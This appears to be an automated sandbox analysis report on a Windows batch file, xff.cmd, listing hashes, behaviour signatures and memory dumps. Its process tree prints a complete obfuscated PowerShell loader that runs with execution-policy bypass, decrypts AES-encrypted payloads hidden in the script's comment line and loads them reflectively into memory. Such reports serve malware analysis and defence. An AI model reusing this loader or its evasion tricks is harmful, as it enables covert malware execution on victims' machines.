Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    03-06-2024 11:15

General

  • Target

    xff.cmd

  • Size

    55KB

  • MD5

    23c88462d32d9ea10a2e1d8dc2c0761d

  • SHA1

    c4b3e713eeb23905db0919ad42eca4c4e04594ba

  • SHA256

    726b4c7268e3ac98dafe554aa3cf05e6ed6a185890ff717702b2e5c606cc64c1

  • SHA512

    cbb8dcec750ec00737c47d5352f13843831dcda49a0bd8c83cad986b47e6353a7d242257e7e08278c153902bec499688d8e89d2f5c73f1d90812234066545f0f

  • SSDEEP

    768:cgYYV4VeUd8SqTSn40DSEg5+VmcA1T++1/WQItIoQMrGvNAoaN/:cgkRqTaRSTNTCCdvNAoaN/

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\xff.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yfl+9e1ujQfBCdBEV6Z2UkstrL+He9SOiaTy/tj4l0c='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7w7wzie8OzwYCnqdovjf0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mCQBR=New-Object System.IO.MemoryStream(,$param_var); $vHGEF=New-Object System.IO.MemoryStream; $UfEkZ=New-Object System.IO.Compression.GZipStream($mCQBR, [IO.Compression.CompressionMode]::Decompress); $UfEkZ.CopyTo($vHGEF); $UfEkZ.Dispose(); $mCQBR.Dispose(); $vHGEF.Dispose(); $vHGEF.ToArray();}function execute_function($param_var,$param2_var){ $cUdZW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FjmYk=$cUdZW.EntryPoint; $FjmYk.Invoke($null, $param2_var);}$eNFll = 'C:\Users\Admin\AppData\Local\Temp\xff.cmd';$host.UI.RawUI.WindowTitle = $eNFll;$xVjlb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eNFll).Split([Environment]::NewLine);foreach ($VLbEL in $xVjlb) { if ($VLbEL.StartsWith(':: ')) { $hpycz=$VLbEL.Substring(3); break; }}$payloads_var=[string[]]$hpycz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2240

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2240-4-0x000007FEF636E000-0x000007FEF636F000-memory.dmp

    Filesize

    4KB

  • memory/2240-5-0x000000001B790000-0x000000001BA72000-memory.dmp

    Filesize

    2.9MB

  • memory/2240-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

    Filesize

    32KB

  • memory/2240-7-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

  • memory/2240-8-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

  • memory/2240-9-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

  • memory/2240-10-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

  • memory/2240-11-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

  • memory/2240-12-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB